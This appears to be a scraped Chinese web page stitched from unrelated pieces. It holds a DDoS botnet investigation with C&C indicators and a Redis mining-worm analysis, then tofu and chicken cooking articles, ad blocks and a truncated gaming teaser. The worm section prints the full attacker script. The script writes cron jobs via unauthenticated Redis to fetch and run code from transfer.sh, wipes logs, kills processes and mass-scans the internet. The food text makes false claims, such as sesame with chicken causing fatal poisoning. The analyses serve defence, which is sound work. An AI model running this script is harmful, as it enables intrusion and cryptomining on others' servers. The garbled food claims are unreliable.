一起涉及多個DDoS殭屍網絡樣本攻擊事件追蹤

網站內容來源http://server.it168.com/

一起涉及多個DDoS殭屍網絡樣本攻擊事件追蹤

2018-05-29 14:45    來源:FreeBuf.COM  作者: 任子行 編輯:
0購買

  一.背景

近期蜜網系統監測到一起涉及利用多個殭屍木馬傳播進行DDoS攻擊的安全事件。木馬樣本涉及Windows與Linux兩個平台,通過對樣本的分析,發現這幾個樣本編寫風格都不一樣,但是硬編碼在程序中的C&C均指向同一個IP地址。推測這一系列木馬的傳播者通過購買不同的DDoS木馬進行傳播,從而構建自己的殭屍網絡進行DDoS攻擊牟利。其中有兩個樣本所屬家族為XorDDoS和ChinaZ。最後通過一系列的分析,將該威脅定性為小黑客組建殭屍網絡進行DDoS攻擊事件,同時追蹤到了惡意代碼傳播者的個人信息,包括姓名、QQ號碼、手機號、郵箱、微信等。

  二.相關樣本分析

2.1樣本一分析:

2.1.1樣本基本信息

2.1.2樣本行為

該樣本首先會執行安裝邏輯,包括拷貝自身到Windows目錄,然後將自身註冊為服務,最後自刪除自己,安裝完成。接着註冊為服務的木馬會開始進入功能邏輯,通過爆破局域網來感染傳播,與C&C建立通訊后,等待C&C下髮指令。

2.1.3樣本詳細分析

(1)整體邏輯

(2)拷貝到Windows目錄

生成6個字符的隨機進程名拷貝到Windows目錄

(3)創建服務

服務名:Abcdef Hijklmno Qrstuvwx Abcd

服務描述:Abcdefgh Jklmnopqr Tuvwxya Cdefghij Lmn

自啟動

(4)自刪除

構建“/c del C:\Users\xxx\Desktop\gy.exe > nul”參數,使用ShellExecuteExA創建刪除自身的進程。

(5)從資源釋放hra33.dll並加載

從資源釋放文件在文件頭加上PE文件頭兩個字節“MZ”。

從釋放的文件更新當前木馬服務中的資源

(6)爆破感染局域網

內置字典

爆破成功後會拷貝自身到admin$\\、C:、D:、E:以及F:等路徑下,並創建計劃任務,2分鐘后執行。

(7)遠控功能部分

與C&C建立通訊

解密出C&C地址為web.liancanmou.xyz:6006

發送上線信息

遠程下載執行

更新

使用iexplorer打開指定網頁

卸載

DDoS攻擊模塊

2.1.4 關聯分析

該IP對應的位置在新鄉電信機房,訪問http://123.160.10.16:3097/gy.exe下載樣本。

通過VT Graph關聯分析該樣本早在2018-05-08已經被發現了,與本次捕獲到的樣本分析結果是一致的。

2.2樣本二分析:

2.2.1樣本基本信息

2.2.2樣本行為

該樣本代碼編寫十分簡單,獲取本地信息回傳CNC上線,等待CNC的DDoS指令。

2.2.3樣本詳細分析

(1)整體邏輯

(2)與C2建立通訊

創建連接套接字

C&C地址為 jch.liancanmou.xyz:52527

木馬通訊協議

(3)DDoS功能

並沒有用到反射放大攻擊,只是一般的flood攻擊。

2.2.4關聯分析

通過VT分析發現該樣本與a.lq4444.com這個域名相關,而該域名曾用於Linux/Elknot這個家族。通過VT显示,a.lq4444.com這個域名與9個樣本相關。

2.3樣本三分析

樣本三與樣本二代碼是一樣的,區別是樣本三被編譯為x86架構,樣本二被編譯為x64架構。

2.4樣本四分析:

2.4.1樣本基本信息

2.4.2樣本行為

(1)該樣本通過SSH爆破被拷貝到/tmp目錄下並開始運行

(2)將自身註冊為服務

(3)拷貝自身到其他目錄

(4)設置定時任務

(5)修改刷新iptables后,嘗試連接到遠程主機。

(6)它會刪除/etc/resolv.conf並保存初始安裝和下載的配置數據(Config.ini)

(7)通過發送用戶名信息連接到C&C,作為一個bot與C&C建立通訊

(8)C&C主要發送帶目標IP地址作為參數的DDoS命令到bot機器進行DDoS攻擊

VT行為分析:

2.4.3樣本詳細分析

寫入腳本到/etc/init.d/%s/與/etc/rc%d.d/S90%s路徑下

設置定時任務

控制網卡接口

以.chinaz為前綴拷貝自身到/tmp/目錄下

安裝完成後會重啟計算機

DDoS相關的一些指紋,其中包含一個QQ號碼:2900570290

  三.事件分析

3.1事件關聯分析

以liancanmou.xyz這個域名為起點,結合樣本分析與VT Graph關聯分析形成以下關聯圖,可以確定123.160.10.16、180.97.220.35以及123.249.9.157這三個IP是用於作為木馬的CNC地址以及木馬分發地址。在2018年5月24日域名liancanmou.xyz從指向123.249.9.157被換位指向180.97.220.35這個IP。

PassiveDNS相關信息

3.2事件溯源

3.2.1域名註冊信息

3.2.2個人信息

  四.IoCs

liancanmou.xyz

web.liancanmou.xyz

jch.liancanmou.xyz

wwt.liancanmou.xyz

wwv.liancanmou.xyz

www.liancanmou.xyz

http://180.97.220.35:3066/Linux4.7

http://123.160.10.16:3097/gy.exe

http://180.97.220.35:3066/33

http://180.97.220.35:3066/32

180.97.220.35

123.249.9.157

123.160.10.16

123.249.9.15

123.249.79.250

180.97.220.35

103.248.220.196

892833AB52DAA816918041670519EB6351AE7EC2DB7AF2C97F3AB5EE214DA173

4A2FB58342D549347D32E54C3DA466A19BFD66364825AC7F2257995356F09AFD

74D4776A76AD3BCB578C9757D9F18A6ADFFE8802C43E5E59B14C4E905664733D

DBC7FC7748BD201C54B2A0189396F3101C18127A715E480C8CB808F07137822A

,
網站內容來源http://safe.it168.com/

【精選推薦文章】

智慧手機時代的來臨,RWD網頁設計已成為網頁設計推薦首選

想知道網站建置網站改版該如何進行嗎?將由專業工程師為您規劃客製化網頁設計後台網頁設計

帶您來看台北網站建置套版網頁設計台北網站改版設計台北RWD響應式網頁設計,各種案例分享

廣告預算用在刀口上,網站設計公司幫您達到更多曝光效益

一起涉及多個DDoS殭屍網絡樣本攻擊事件追蹤

Linux Redis自動化挖礦感染蠕蟲分析及建議

網站內容來源http://server.it168.com/

Linux Redis自動化挖礦感染蠕蟲分析及建議

2018-05-30 17:06    來源:安全客  作者: 雲鼎實驗室 Fooying 編輯:
0購買

  一、 背景

自從Redis未授權問題獲取Linux系統root權限的攻擊方法的披露后,由於其易用性,利用該問題入侵Linux服務進行挖礦、掃描等的黑客行為一直層出不窮;而在眾多利用該問題入侵服務器進行黑產行為的案例中,其中就存在一類利用該問題進行挖礦並且會利用pnscan自動掃描感染其他機器;該類攻擊一直存在,不過在近期又呈現數量增加的趨勢,在最近捕獲到多次,我們針對其做下具體的分析。

  二、 漏洞說明

首先針對利用的漏洞做個說明,Redis 默認情況下,會綁定在 0.0.0.0:6379,在沒有利用防火牆進行屏蔽的情況下,將會將Redis服務暴露到公網上,如果在沒有開啟認證的情況下,可以導致任意用戶在可以訪問目標服務器的情況下未授權訪問Redis以及讀取Redis的數據。攻擊者在未授權訪問Redis的情況下利用Redis的相關方法,可以成功將自己的公鑰寫入目標服務器的 ~/.ssh 文件夾的authotrized_keys 文件中,進而可以直接登錄目標服務器;如果Redis服務是以root權限啟動,可以利用該問題直接獲得服務器root權限。相關漏洞詳情可以參考:

https://www.seebug.org/vuldb/ssvid-89715

以下為漏洞利用演示(上傳不了視頻,播放地址:https://v.qq.com/x/page/u0661b9o772.html):

經過在ZoomEye和SHODAN檢索,可以發現分別眾多Redis服務開放在公網上,這些服務都可能成為攻擊目標。

  三、 入侵分析

經過對捕獲的事件進行分析,我們發現整個入侵流程大概是包含以下幾個環節:1、掃描開放6379端口的Linux服務器(後續感染掃描網段為1.0.0.0/16到224.255.0.0/16)

2、通過redis-cli嘗試連接Redis並執行預置在.dat文件里的利用命令將Redis的數據文件修改為/var/spool/cron/root,然後通過在Redis中插入數據,將下載執行腳本的動作寫入crontab任務

3、通過腳本實現以上的相關行為,完成植入並啟動挖礦程序

4、再編譯安裝pnscan,繼續掃描感染下一個目標

 四、 腳本分析

整個入侵利用以及後續的感染的實現,最主要的功能都是基於通過Redis問題寫入crontab任務中下載執行的NaNd腳本(https://transfer.sh/MIpIA/tmp.9kIguIhkI7)來實現的,通過對它的分析,我們基本能夠得到整個流程的所有細節,這是一個base腳本,我們通過解讀來分析下它的相關功能。

1. sleep 1

2. find . -maxdepth 1 -name “.mxff0” -type f -mmin +60 -delete

3. [ -f .mxff0 ] && exit 0

4. echo 0 > .mxff0

這部分代碼只要是用作重複執行的判斷,將.mxff0文件作為標記文件,如果存在該文件則代表機器上已執行腳本,直接退出,否則寫.mxff0文件並進行下一步動作;

5. trap “rm -rf .m* NaNd tmp.* .r .dat $0” EXIT

設置預置動作,在腳本退出后刪除相關文件和腳本自身;

6. setenforce 0 2>/dev/null

7. echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

8. crontab -r 2>/dev/null

9. rm -rf /var/spool/cron 2>/dev/null

10. grep -q 8.8.8.8 /etc/resolv.conf || echo “nameserver 8.8.8.8” >> /etc/resolv.conf

11. rm -rf /tmp/* 2>/dev/null

12. rm -rf /var/tmp/* 2>/dev/null

13. rm -rf /etc/root.sh 2>/dev/null

14. sync && echo 3 > /proc/sys/vm/drop_caches

15. cat <<EOF> /etc/security/limits.conf

16. * hard nofile 100000

17. * soft nofile 100000

18. root hard nofile 100000

19. root soft nofile 100000

20. * hard nproc 100000

21. * soft nproc 100000

22. root hard nproc 100000

23. root soft nproc 100000

24. EOF

這部分主要是修改系統的配置,6、7行為關閉SELINU;

然後清空/var/spool/cron,進而判斷系統DNS服務器是否存在8.8.8.8,沒有則添加;

11-13則清空系統tmp目錄和刪除相關文件;

14行清空系統緩存,而15-24則是修改系統的資源限制;

25. iptables -I INPUT 1 -p tcp –dport 6379 -j DROP

26. iptables -I INPUT 1 -p tcp –dport 6379 -s 127.0.0.1 -j ACCEPT

27. ps xf | grep -v grep | grep “redis-server|nicehash|linuxs|linuxl|crawler.weibo|243/44444|cryptonight|stratum|gpg-daemon|jobs.flu.cc|nmap|cranberry|start.sh|watch.sh|krun.sh|killTop.sh|cpuminer|/60009|ssh_deny.sh|clean.sh|./over|mrx1|redisscan|ebscan|redis-cli|barad_agent|.sr0|clay|udevs|.sshd|/tmp/init” | while read pid _; do kill -9 “$pid”; done

這裏再進一步的增加iptables限制6379端口只允許本地訪問,同時kill相關包含挖礦、redis客戶端、爬蟲等進程,這裏的目的也比較簡單,避免被其他黑客再次入侵,同時清除可能其他黑客入侵啟動的進程;

28. rm -rf /tmp/* 2>/dev/null

29. rm -rf /var/tmp/* 2>/dev/null

30. echo 0 > /var/spool/mail/root

31. echo 0 > /var/log/wtmp

32. echo 0 > /var/log/secure

33. echo 0 > /root/.bash_history

清除相關登錄日誌、命令操作歷史;

34. YUM_PACKAGE_NAME=”iptables gcc redis coreutils bash curl wget”

35. DEB_PACKAGE_NAME=”coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl”

36. if cat /etc/*release | grep -i CentOS; then

37. yum clean all

38. yum install -y -q epel-release

39. yum install -y -q $YUM_PACKAGE_NAME

40. elif cat /etc/*release | grep -qi Red; then

41. yum clean all

42. yum install -y -q epel-release

43. yum install -y -q $YUM_PACKAGE_NAME

44. elif cat /etc/*release | grep -qi Fedora; then

45. yum clean all

46. yum install -y -q epel-release

47. yum install -y -q $YUM_PACKAGE_NAME

48. elif cat /etc/*release | grep -qi Ubuntu; then

49. export DEBIAN_FRONTEND=noninteractive

50. rm -rf /var/lib/apt/lists/*

51. apt-get update -q –fix-missing

52. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

53. elif cat /etc/*release | grep -qi Debian; then

54. export DEBIAN_FRONTEND=noninteractive

55. rm -rf /var/lib/apt/lists/*

56. apt-get update –fix-missing

57. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

58. elif cat /etc/*release | grep -qi Mint; then

59. export DEBIAN_FRONTEND=noninteractive

60. rm -rf /var/lib/apt/lists/*

61. apt-get update –fix-missing

62. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

63. elif cat /etc/*release | grep -qi Knoppix; then

64. export DEBIAN_FRONTEND=noninteractive

65. rm -rf /var/lib/apt/lists/*

66. apt-get update –fix-missing

67. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

68. else

69. exit 1

70. fi

71. sleep 1

72. if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then

73. curl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12

74. sleep 1

75. [ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112

76. fi

這一長串的內容主要目的是下載並編譯安裝pnscan,從內容中我們可以看到對於不同操作系統的判斷然後安裝依賴的相關模塊,然後才是從github下載pnscan的源碼進行編譯安裝;至於為什麼採用編譯安裝的形式,猜測是出於兼容不同系統以及每次編譯生成的pnscan的MD5都不一樣,避免形成固定特徵;

77. tname=$( mktemp )

78. OMURL=https://transfer.sh/MIpIA/tmp.vOYTgmtZge

79. curl -s $OMURL > $tname || wget -q -O $tname $OMURL

80. NMURL=$( curl -s –upload-file $tname https://transfer.sh )

81. mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg

這部分主要是下載挖礦程序並重命名為.gpg,增加執行權限,執行后刪除,同時重新上傳到https://transfer.sh/ 獲取新的鏈接;

82. [ -z “$NMURL” ] && NMURL=$OMURL

83. ncmd=$(basename $(mktemp))

84. sed ‘s|’”$OMURL”‘|’”$NMURL”‘|g’ < NaNd > $ncmd

85. NSURL=$( curl -s –upload-file $ncmd https://transfer.sh )

86. echo ‘flushall’ > .dat

87. echo ‘config set dir /var/spool/cron’ >> .dat

88. echo ‘config set dbfilename root’ >> .dat

89. echo ‘set Backup1 “tn*/2 * * * * curl -s ‘${NSURL}’ > NaNd && bash NaNdnt”‘ >> .dat

90. echo ‘set Backup2 “tn*/5 * * * * wget -O NaNd ‘${NSURL}’ && bash NaNdnt”‘ >> .dat

91. echo ‘set Backup3 “tn*/10 * * * * lynx -source ‘${NSURL}’ > NaNd && bash NaNdnt”‘ >> .dat

92. echo ‘save’ >> .dat

93. echo ‘config set dir /var/spool/cron/crontabs’ >> .dat

94. echo ‘save’ >> .dat

95. echo ‘exit’ >> .dat

而這部分內容主要是生成新的.dat文件,包含將原來NaNd腳本里的里挖礦程序的下載地址替換為上一步上傳到https://transfer.sh/ 得到的新地址,還有Redis利用的相關語句;

96. pnx=pnscan

97. [ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan

98. [ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan

99. for x in $( seq 1 224 | sort -R ); do

100. for y in $( seq 0 255 | sort -R ); do

101. $pnx -t512 -R ‘6f 73 3a 4c 69 6e 75 78’ -W ‘2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a’ $x.$y.0.0/16 6379 > .r.$x.$y.o

102. awk ‘/Linux/ {print $1, $3}’ .r.$x.$y.o > .r.$x.$y.l

103. while read -r h p; do

104. cat .dat | redis-cli -h $h -p $p –raw &

105. done < .r.$x.$y.l

106. done

107. done

而步主要是調用pnscan去掃描子網段1.0.0.0/16到224.255.0.0/16中開放6379端口並且操作系統為Linux的目標,然後利用redis-cli執行.dat中的命令,進行下個目標的感染;這裏pnscan的-W參數值‘2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a’轉換后內容‘*1rn$4rnINFOrn’,是向目標Redis服務發送請求獲取Redis服務器的各種信息和統計數值,再通過-R參數值‘6f 73 3a 4c 69 6e 75 78′(轉換后內容為os:Linux)判斷是否Linux系統。

108. echo 0 > /var/spool/mail/root 2>/dev/null

109. echo 0 > /var/log/wtmp 2>/dev/null

110. echo 0 > /var/log/secure 2>/dev/null

111. echo 0 > /root/.bash_history 2>/dev/null

112. exit 0

最後就是收尾工作,清除相關日誌和命令執行歷史,同時在腳本退出的時候會觸髮腳本一開始用trap預置的動作,會做刪除操作,刪除相關文件和腳本自身(rm -rf m* NaNd tmp.* .r .dat $0)。

通過對腳本的解讀,我們基本已經清楚整個蠕蟲的行為和入侵流程,也就是我們開始所描述的流程。

另外,通過閱讀腳本,我們發現雖然整個入侵流程並不是多複雜,但腳本其實有很多”工程化”的細節考慮,不得不讓人驚嘆入侵者的”考慮周到”:

1、 利用.mxff0文件做重複執行檢驗,避免腳本的重複執行

2、 為了增加成功性,一些環境的預處理:

a) 關閉SELINUX

b) 增加8.8.8.8的DNS

c) 清空tmp目錄

d) 清空系統緩存

e) 修改系統資源限制

3、 痕迹清除

a) 利用trap預置動作好在腳本執行完成后刪除相關文件和腳本自身

b) 重複清除相關登錄等日誌和命令執行歷史

4、 同行預防

a) 利用iptables避免Redis服務開放在公網上從而導致再次被入侵

b) 清除同行可能遺留的入侵行為,kill相關進程

5、 系統兼容性

a) 判斷操作系統,針對性的執行相關命令,安裝依賴包,最大限度的提高pnscan編譯安裝的成功率

b) 關閉SELINUX,通過setenforce和修改/etc/sysconfig/selinux兩種手段實現

c) 寫入Crontab里的下載並執行腳本的任務,通過curl、wget、lynx三種方式實現

d) Pnscan掃描增加操作系統判斷,減少沒有必要的感染嘗試

6、 特徵去除,存活延續

a) Pnscan採用安裝編譯的方式,既提高在不同系統下的兼容性,也避免形成固定的MD5特徵

b) 利用https://transfer.sh 中轉,每一次感染均生成新的連接,避免固定鏈接形成固定特徵

c) 下載到系統的相關文件均採用隨機生成的文件名

正是由於入侵者種種的”考慮周到”使得他的入侵感染的成功率能夠達到的一定的層度。

五、 安全建議

病毒清理和系統恢復

我們主要參考腳本的相關行為進行對應的行為恢復和刪除即可:

1、 關閉SELINUX,根據系統原環境和業務需要重新開啟SELINUX

2、 清空了/var/spool/cron,根據原先備份清空恢復

3、 修改/etc/resolv.conf增加DNS服務8.8.8.8,如無影響可不處理,或者刪除

4、 修改了系統資源限制(/etc/security/limits.conf),可根據備份情況恢復

5、 增加了對6379端口的Iptables規則,如果不影響業務,建議保留

6、 Kill了相關進程,檢查是否包含業務所需進程,根據情況恢復

7、 安裝了相關包,具體列表見上文,可根據情況刪除或者如無影響可保留

8、 編譯安裝了pnscan,可刪除/usr/local/bin/pnscan

9、 清除了相關日誌和tmp目錄,對系統無影響,可忽略

10、 啟動了挖礦進程和pnscan掃描感染,進程:.gpg、pnscan,直接kill

還包含了一些中間文件,雖然腳本包含相關刪除操作,但建議還是全局查找確認:.mxff0、.x112、.gpg、.dat、NaNd、.r.xx.xx.o/l、tmp.xxxx

Redis服務加固

1、 如無必要,修改bind項,不要將Redis綁定在0.0.0.0上,避免Redis服務開放在外網,可以通過iptables或者騰訊雲用戶可以通過安全組限制訪問來源

2、 在不影響業務的情況,不要以root啟動Redis服務,同時建議修改默認的6379端口,大部分針對Redis未授權問題的入侵都是針對默認端口進行的

3、 配置AUTH,增加密碼校驗,這樣即使開放在公網上,如果非弱口令的情況,黑客也無法訪問Redis服務進行相關操作

4、 使用rename-command CONFIG “RENAME_CONFIG”重命名相關命令,這樣黑客即使在連接上未授權問題的Redis服務,在不知道命令的情況下只能獲取相關數據,而無法進一步利用

  六、 附錄

IOCs

1. 腳本 https://transfer.sh/MIpIA/tmp.9kIguIhkI7

2. 挖礦程序 2918ee2b69bc4e6b581c7b25f08434fe

3. 礦池域名 http://jb.chakpools.com/

4. 相關文件名 .mxff0、.x112、.gpg、.dat、NaNd、.r.xx.xx.o/l、tmp.xxxx

  鏈接

1. 樣本 https://www.virustotal.com/#/file/9756e66c168ec963c58b3d0ca5483927c14a64a99ba718fa9488a52d4d207ed6

2. Pnscan項目地址 https://github.com/ptrrkssn/pnscan

3. 漏洞說明 https://www.seebug.org/vuldb/ssvid-89715

4. 漏洞利用演示 https://v.qq.com/x/page/u0661b9o772.html

5、雲鏡產品官網 https://cloud.tencent.com/product/hs

網站內容來源http://safe.it168.com/

【精選推薦文章】

如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

想要讓你的商品在網路上成為最夯、最多人討論的話題?

網頁設計公司推薦更多不同的設計風格,搶佔消費者視覺第一線

不管是台北網頁設計公司台中網頁設計公司,全省皆有專員為您服務

想知道最厲害的台北網頁設計公司推薦台中網頁設計公司推薦專業設計師”嚨底家”!!

Linux Redis自動化挖礦感染蠕蟲分析及建議

油炸豆腐泡

文章導讀

油炸豆腐泡是日常飲食上十分常見的一道傳統美食,主要是用豆腐所製作而成的,經過高溫油炸之後口感變得非常好,而且其中的營養價值豐富,經常食用可以補充身體所需要的都蛋白,同時也可以起到預防疾病的作用,而且做法也很簡單,自己在家也可以輕鬆製作。

油炸豆腐泡的做法是什麼?

製作方法

家常做法

油的選擇:炸油以豆油、菜籽油、花生油為主。

制油炸坯:

做法

一斤干豆子磨8.5到9斤漿,先把第二遍漿和第三遍漿混合一起煮,千萬不要煮開,煮到85度到90度之間就停止加熱出鍋;

豆腐花

然後把第一遍生漿(生漿比較濃)與出鍋的漿液混合,沖勻後用凝固劑沖之;

蹲腦15分鐘左右上框,上滿眶大概壓下去一半,油炸豆腐坯的含水量是介於豆腐和豆腐乾之間;

油炸豆腐坯的含水量是介於豆腐和豆腐乾之間。

做法2

1、豆漿的濃度與制豆腐乾的濃度相同,濾漿后待漿溫降至80℃左右時加入涼水,降至70℃時點腦;

白豆腐

2、每100千克豆漿加入涼水10千克、蘇打100克、用滷水點之;或者豆漿中不加蘇打,每100千克豆漿加入涼水15千克,用滷水點之;

3、下滷水要慢,翻漿也要慢。腦要點嫩些,蹲腦時間稍長些;

4、點好腦後上模型壓榨,壓好后的坯子應表面亮無麻點,一斤干豆出兩斤左右的坯子。

油炸方法採用兩步法:

1、油炸豆腐泡第一階段,第一階段採用較低的油溫炸之,溫油時入鍋,坯子

內部的水分氣化膨脹,表面緩

豆腐泡

慢失水,使豆腐坯徐徐膨脹;

2、第二階段為高溫定型階段,其目的是在初膨脹的基礎上,使坯子充分膨脹,油溫一般控制在160度到180度之間,炸好后撈出。

油炸后要注意:

1、豆腐坯子含水量過低,或炸制時攪動過大,或坯子表面不光滑,或在油溫中炸制時間過長,都容易產生豆腐泡喝油現象;

2、油溫要控制好,油溫過高,則不易起泡,引起 “放泡”,很不安全。

工業做法

豆腐泡

點漿:制豆腐泡的豆漿可以稍淡,以每千克大豆制豆漿10千克為宜。為促進豆腐泡的發泡,可在熟漿中加10%的冷水。點漿時豆漿溫度宜掌握在85℃左右,凝固劑宜用27%鹽滷,用水稀釋到10%再使用,點漿方法同豆腐乾。

脹漿:時間5~10分鐘,方法同其他豆製品。

扳泔或汰泔:扳泔方法與豆腐乾扳泔相同,但一定要把板插入豆腐花缸底部,要扳兩下,扳足,使豆腐花翻得徹底。只有把豆腐花點足、扳足,才能使豆腐泡發透、發足。汰泔就是在鹽滷停止點入豆漿內,銅勺仍應繼續不停地左右攪動,使豆腐花繼續上下翻動,直到泔水大量泄出,豆腐花全面下沉為止。這個工藝俗稱“汰”。採用“汰泔”工藝製作的豆腐泡比“扳泔”法的產品發得透,發得足,但得出品略低些。

抽泔:方法與豆腐乾抽泔相同,即抽去豆腐花表層的黃漿水。

網站內容來源https://www.cndzys.com/yinshi/網站內容來源https://www.cndzys.com/yinshi/

【精選推薦文章】

想知道台東名產人氣商品是什麼?想知道更多台東知名伴手禮有哪些?

想知道全國票選五大台東必買台東伴手禮最佳商品哪裡買的到?

台東團購美食台東必買零食首選都在”購夠台東

台東人氣名產台東人氣伴手禮,熱門獨家商品,現貨供應中

油炸豆腐泡

雞肉不可以和什麼一起吃

文章導讀

雞肉總體來說是一種蛋白質含量非常高的肉製品,所以對於身體中蛋白質匱乏或者健身人士來說,可以多吃雞肉補充身體蛋白質。並且雞肉是一種自古以來就在人們餐桌上經常出現的食物,所以雞肉自然也衍生出了許多不同的做法,例如宮保雞丁土豆燒雞等。但是在吃雞肉的同時,一定要認識到什麼食物不能和雞肉一起吃。

雞肉不能和什麼一起吃

第1步雞肉+芹菜:雞肉和芹菜一起吃影響食物營養元素的吸收,破壞食物的營養結構,吃了會傷元氣。

第2步雞肉+李子:雞肉+李子一起吃會出現胃腸道反應出現腹痛腹瀉,對身體健康不利。

第3步雞肉+檸檬:雞肉不要和檸檬一起吃,因雞肉中的蛋白質和檸檬中的檸檬酸結合,會不利於人體消化和吸收。

第4步雞肉+菊花:雞肉和菊花一起吃會產生化學反應從而會引起食物中毒。

第5步雞肉+兔肉:雞肉和兔肉一起吃,一冷一熱,容易造成腹痛腹瀉的癥狀。

第6步雞肉+芝麻:雞肉和芝麻一起會產生化學反應從而引起中毒,嚴重的會導致死亡。

第7步雞肉+鮑魚:雞肉和鮑魚一起吃會破壞食物原有的營養結構從而影響消化吸收。

第8步雞肉+糯米:雞肉和糯米一起吃會引起胃腸不適,出現胃痛,胃脹等消化不良的癥狀。

第9步雞肉+狗腎:雞肉和狗腎一起吃會引起腹痛腹瀉的癥狀,對身體健康不利。

第10步雞肉+啤酒:雞肉和啤酒一起吃會形成脂肪肝,還可能引起關節炎。

第11步雞肉+蝦:雞肉和蝦一起吃會破壞食物原有的營養結構從而降低食物的營養價值。

第12步雞肉+芹菜:芹菜富含維生素C,雞肉包含較多的蛋白質,雞肉和芹菜一起吃易損傷元氣。

第13步雞肉+紅薯:雞肉含有大量蛋白質,需要肝髒的配合才可消化,而地瓜屬於難消化的食品,雞肉和紅薯一起吃有也許會造成腹痛、腹脹。

網站內容來源https://www.cndzys.com/yinshi/網站內容來源https://www.cndzys.com/yinshi/

【精選推薦文章】

評選台東伴手禮推薦商品「釋迦 」是台東必買伴手禮之一

來台東旅遊不可錯過的,台東必買名產 「池上米、地瓜酥、洛神花」都在”購夠台東“網路商城皆買的到哦!

台東吃喝懶人包!台東名產推薦台東名產伴手禮台東團購美食,都在這裡”報吼你災”

2019票選台東必買 最佳節慶送禮、年節伴手禮,釋迦禮盒小農禮盒深受國人的青睞!

雞肉不可以和什麼一起吃

雞肉怎麼過水

文章導讀

雖然雞肉的腥味並不像其他肉製品那樣濃重,但是雞肉畢竟是一種肉類食物,所以在製作雞肉之前也需要利用一些去腥手段去腥。其中給雞肉焯水,是不少家庭都會選擇的一種去腥手段,因為這種去腥手段可以達到的效果非常明顯。下面的文章將為大傢具體帶來,給雞肉焯水的相關注意事項以及小方法。

雞肉過水用涼水。

雞肉焯水(使用冷水)的步驟如下:

1、將雞肉洗凈切塊,然後倒入料酒和薑片用手抓勻,腌制半個小時,讓其充分結合,這樣也能達到去腥的效果。

2、燒一大鍋水開水焯水,倒入冷水后再放入腌制好的雞塊,最後再放入幾片薑片和蔥段,這樣可以達到更好的去腥效果。隨着溫度的上升,水面上就會慢慢浮出一些血沫和黑色浮油,將這些浮沫去除。

3、焯水時間不要太久,控制在7-8分鐘左右就好了,畢竟不是在燉雞湯,這些水面上的浮沫去除后就可把雞塊全部撈出,然後再用冷水沖洗幾遍,這樣可以使雞肉更加緊緻,更加嫩滑。這樣處理過後的雞肉不會有一點生腥味,肉質還會更加嫩滑,接着再用來烹調不但能夠縮短烹飪時間,還能使雞肉的味道更加鮮美。

雞肉怎麼做才嫩

1、上漿的三步

上漿的三步完成了,雞肉就能成功鎖住水分,做出來的雞肉就會變得非常嫩滑。雞肉上漿的原理:

(1)揉入少許水,讓雞肉吸收飽滿的水分。

做法:切好的雞肉,加入適量水,用手不停摔打,讓水分進入到雞肉中,摔打至有粘性即可。

(2)加入蛋清,將吸收了水分的雞肉裹起來,雞肉再焯水或過油的時候,水分就會析出。

做法:加入一個蛋清,使水分裹在雞肉裏面,再用手不停攪拌,讓蛋清裹住雞肉。

(3)裹上澱粉,會使雞肉的口感更加滑嫩,水份更加牢固地鎖住在雞肉裏面。

做法:上一步攪拌感覺雞肉沾手、有光澤了,再加1勺澱粉,然後抓幾下,腌製片刻。

2、食醋水浸泡

雞肉用猛火燉煮,肉質較硬不可口,建議還可先用涼水加少量食醋泡上2個小時左右,再進行烹煮,肉質就會變得比較鮮嫩。

3、加啤酒

雞肉燉煮或燒制的時候,加點啤酒比較好,啤酒不但可以讓雞肉更加鮮嫩,而且味道純正,鮮嫩可口,還可去腥。

4、鹽不宜早放

煮雞肉宜用砂鍋煮。將整隻雞放進砂鍋裏面,倒上水,放根蔥,放上蒜,記住這時一定不能放鹽,放鹽越煮越老。燉上幾個小時,味道特別香,然後再根據自己口味在放點鹽。鹽不宜早放,一般出鍋前10分鐘左右放比較合適。

5、冷凍

如果是從市場剛買來的活雞,應先放冰箱冷凍室冰凍3~4個小時再取出解凍燉煮。這和排酸肉的原理是相同的,動物驟然被殺,體內會自然釋放多種毒素,而且剛宰殺的熱肉細菌繁殖迅速。冷凍既殺菌,也讓肉從“僵直期”過渡“腐敗期”到 “成熟期”,這時的肉質最好,再來燉湯做菜明顯香嫩。

6、用燉湯法

一般我們煮雞肉都是直接加熱的,如果想吃到更加嫩滑的雞肉,建議採用隔水加熱的燉湯法。“隔水”的燉湯品質最高。通過燉盅外的水的高溫和蒸氣,間接使燉盅內的溫度升至沸點,原料的精華全部逼入湯中。燉湯湯色清澈,更為原汁原味。

另外,食材雖燉至熟爛,但形狀也能保持完整。燉出來的肉質也比較軟嫩。而直接加熱煮的雞肉,易讓湯汁的顏色較混濁,食材也因久煮,形狀多半爛掉,且味道都滲入湯汁里,口感既澀又無味。

做法:把原材料與清水放在砂鍋(或燉盅)里,蓋上鍋蓋,置於一大鍋內(鍋內的水量低於砂鍋,以水沸時不溢進砂鍋為宜)。

網站內容來源https://www.cndzys.com/yinshi/網站內容來源https://www.cndzys.com/yinshi/

【精選推薦文章】

一生必吃一次芒果界的LV,皆在購夠台東網路商城!

台東名產,台東美食吃透透,網購票選人氣NO.1商品,快速滿足您的味蕾!

當地限定的台東伴手禮,讓您買到剁手!內行人推這8樣台東必買零食!

雞肉怎麼過水

任天堂聯姻騰訊,會是一樁皆大歡喜的婚事嗎?

這一步是很有意義的,也是一件好事,畢竟,一個更開放、更多元、競爭激烈的遊戲環境,才能誕生更多優秀的公司和值得掏空錢包的作品。

文/駱北

來源:刺蝟公社(ID:ciweigongshe)

